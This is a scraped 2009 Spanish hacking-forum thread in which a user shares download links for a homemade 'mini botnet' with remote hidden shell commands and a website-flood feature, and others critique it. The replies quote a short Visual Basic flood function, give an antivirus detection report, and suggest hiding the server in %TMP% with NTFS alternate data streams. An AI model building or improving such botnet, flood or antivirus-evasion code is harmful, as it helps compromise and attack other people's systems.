elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:25  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  SCB Lab's Mini Botnet + Source
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: SCB Lab's Mini Botnet + Source  (Leído 7,034 veces)
shark0

Desconectado Desconectado

Mensajes: 195



Ver Perfil WWW
SCB Lab's Mini Botnet + Source
« en: 23 Diciembre 2009, 17:08 »

Bueno estaba dudando si hacer esta mini botnet privada o publica, al final llegué a la conclusión de que los ultimos programas han sido privados. Aqui les dejo esta mini botnet que fue terminada la anterior semana cuyo objetivo es mostrar/enseñar como trabaja.



>> Características :
- Website flood : Abre 6 veces la web en diferente frames integrados en el servidor.
- Shell command : Envia un comando MSDOS al servidor en modo oculto.
- Server options : Opciones del servidor (reiniciar, cerrar, desinstalar).
- Build server : Constructor del servidor.
- Edit port : Edita el puerto de escucha
- Sound notifier : Activa/Desactiva el sonido de notificación

>> Compatibilidad :
- Windows XP SP2/SP3 (100%)
- Windows Vista/Windows 7 (90%)

Descargar SCB Lab's Mini Botnet (Binario)
Descargar SCB Lab's Mini Botnet (Source)

Contraseña de los ficheros : SCB Lab's
Creditos a Leandro Ascierto por el modulo mSock

Saludos!  ;D

PD : Felices fiestas!
En línea

Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: SCB Lab's Mini Botnet + Source
« Respuesta #1 en: 23 Diciembre 2009, 19:19 »

- Windows Vista/Windows 7 (90%)
Como se puede ser 90% compatible? :xD Que es lo que falla en Vista/7?

A ver... cositas respecto al code del server, el del builder ni lo he mirado :P
  • NO utilices iFRAME! Yo por ejemplo no lo tengo... usa WinHTTP o abre la pagina con el navegador oculto... o algo asi...(Ademas, te ahorrarias poner un form :P)
  • El EOF esta pasado de moda :P
  • Bonita encriptacion ;D
  • No deberias sacar tu ruta mediante app.X y luego añadir ".exe" porque si renombro el ejecutable a .scr/.com/.piff o cualquier otra extension ejecutable no ira :-\

Nivel de deteccion:
Citar
File Info

Report generated: 23.12.2009 at 19.37.29 (GMT 1)
Filename: ssss.exe
File size: 45150
MD5 Hash: 5f70536b8836859c1eed5c8f246975e8
SHA1 Hash: 49E1CF2DFD0B8B10659C7AA958C7289F8FB445A5
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 3 on 24

Detections

a-squared - -
Avira AntiVir - TR/VB.Downloader.Gen
Avast - -
AVG - -
BitDefender - Gen:Trojan.Heur.VB.cm1@dOG6HKG
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - HEUR:Trojan.Win32.Generic
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org

Ah! Otra cosa, no me gustan las botnets :laugh: :laugh:

Felices fiestas!! :D :D
« Última modificación: 23 Diciembre 2009, 19:39 por Karcrack » En línea

YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #2 en: 23 Diciembre 2009, 19:31 »

Código
Public Function sDDOS(Host As String)
frmMain.WB.Navigate Host
frmMain.WB2.Navigate Host
frmMain.WB3.Navigate Host
frmMain.WB4.Navigate Host
frmMain.WB5.Navigate Host
frmMain.WB6.Navigate Host
End Function


Eso no doseara nada decentemente maximo dejara una web lenta un rato :P .

¿Por cierto lo de 90% compatible es por que se copia en system32 y Vista y 7 saltan ?

Salu2 :P
« Última modificación: 23 Diciembre 2009, 19:35 por YST » En línea



Yo le enseñe a Kayser a usar objetos en ASM
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: SCB Lab's Mini Botnet + Source
« Respuesta #3 en: 23 Diciembre 2009, 19:40 »

¿Por cierto lo de 90% compatible es por que se copia en system32 y Vista y 7 saltan ?
Parece ser eso... :P
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.508


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #4 en: 23 Diciembre 2009, 19:42 »

Yo tengo una pregunta de duda general... porque todos quieren copiarse dentro de %WINDIR% o %SYSTEM% ? es que no hay imaginacion?
En línea

YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #5 en: 23 Diciembre 2009, 19:54 »

Citar
NO utilices iFRAME! Yo por ejemplo no lo tengo... usa WinHTTP o abre la pagina con el navegador oculto... o algo asi...(Ademas, te ahorrarias poner un form :P)

Se utilizan Sockets y Hilos y lo mas importante un bucle ! :P
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: SCB Lab's Mini Botnet + Source
« Respuesta #6 en: 23 Diciembre 2009, 20:03 »

Citar
NO utilices iFRAME! Yo por ejemplo no lo tengo... usa WinHTTP o abre la pagina con el navegador oculto... o algo asi...(Ademas, te ahorrarias poner un form :P)

Se utilizan Sockets y Hilos y lo mas importante un bucle ! :P
Si bueno, pero eso en VB es inestable... :rolleyes: (En ASM no tanto eh? :xD)

Yo tengo una pregunta de duda general... porque todos quieren copiarse dentro de %WINDIR% o %SYSTEM% ? es que no hay imaginacion?

Tu que eres tan imaginativo... donde lo metes? en Mis Documentos? :¬¬
El mejor lugar en mi opinion es %TMP%+ADS(Solo NTFS), cualquier usuario tiene acceso de escritura ahí.
En línea

[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.508


El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #7 en: 23 Diciembre 2009, 20:05 »

Citar
NO utilices iFRAME! Yo por ejemplo no lo tengo... usa WinHTTP o abre la pagina con el navegador oculto... o algo asi...(Ademas, te ahorrarias poner un form :P)

Se utilizan Sockets y Hilos y lo mas importante un bucle ! :P
Si bueno, pero eso en VB es inestable... :rolleyes: (En ASM no tanto eh? :xD)

Yo tengo una pregunta de duda general... porque todos quieren copiarse dentro de %WINDIR% o %SYSTEM% ? es que no hay imaginacion?

Tu que eres tan imaginativo... donde lo metes? en Mis Documentos? :¬¬
El mejor lugar en mi opinion es %TMP%+ADS(Solo NTFS), cualquier usuario tiene acceso de escritura ahí.

:xD lo pondria en el escritorio

En línea

YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #8 en: 23 Diciembre 2009, 20:08 »

Citar
NO utilices iFRAME! Yo por ejemplo no lo tengo... usa WinHTTP o abre la pagina con el navegador oculto... o algo asi...(Ademas, te ahorrarias poner un form :P)

Se utilizan Sockets y Hilos y lo mas importante un bucle ! :P
Si bueno, pero eso en VB es inestable... :rolleyes: (En ASM no tanto eh? :xD)

Claro :xD Pero vamos cualquier lenguaje decente te aguanta hilos :P Por eso no me gusta VB6 prefiero delphi  :xD
En línea



Yo le enseñe a Kayser a usar objetos en ASM
invisible_hack


Desconectado Desconectado

Mensajes: 981


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #9 en: 23 Diciembre 2009, 20:23 »

No es por fastidiar...porque de seguro te ha llevado tu trabajo el bichito...pero...¿no estaba prohibido hablar o publicar cosas sobre BotNets?  :silbar:

Pero ya digo, buen trabajo, me gusta la interfaz, simplecita pero a la vez amigable, y con bastantes opciones que usar...

Un saludo.
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #10 en: 23 Diciembre 2009, 20:29 »

No es por fastidiar...porque de seguro te ha llevado tu trabajo el bichito...pero...¿no estaba prohibido hablar o publicar cosas sobre BotNets?  :silbar:

Pero ya digo, buen trabajo, me gusta la interfaz, simplecita pero a la vez amigable, y con bastantes opciones que usar...

Un saludo.

No no esta prohibido ;)
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: SCB Lab's Mini Botnet + Source
« Respuesta #11 en: 23 Diciembre 2009, 20:48 »

No no esta prohibido ;)
Siempre y cuando el objetivo sea educativo, en este caso lo es, hay code :P
En línea

invisible_hack


Desconectado Desconectado

Mensajes: 981


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #12 en: 23 Diciembre 2009, 23:26 »

Oks, entonces retiro lo dicho  :-X

Solamente espero que esta herramienta no caiga en malas manos...

Un saludo.
En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
Karcrack
Moderador
***
Desconectado Desconectado

Mensajes: 2.132


Se siente observado ¬¬'


Ver Perfil
Re: SCB Lab's Mini Botnet + Source
« Respuesta #13 en: 24 Diciembre 2009, 00:13 »

Oks, entonces retiro lo dicho  :-X

Solamente espero que esta herramienta no caiga en malas manos...

Un saludo.
Mucho daño no creo que hiciera eso, no?
En línea

YST


Desconectado Desconectado

Mensajes: 963


I'm you


Ver Perfil WWW
Re: SCB Lab's Mini Botnet + Source
« Respuesta #14 en: 24 Diciembre 2009, 04:05 »

Oks, entonces retiro lo dicho  :-X

Solamente espero que esta herramienta no caiga en malas manos...

Un saludo.
Mucho daño no creo que hiciera eso, no?

Podria caer en las manos del peor tipo del mundo y no botaria nada mas aya de un server casero :P
En línea



Yo le enseñe a Kayser a usar objetos en ASM
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Zeus botnet source
Análisis y Diseño de Malware
Ca0s 5 2,972 Último mensaje 19 Junio 2011, 10:42
por bitmann
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines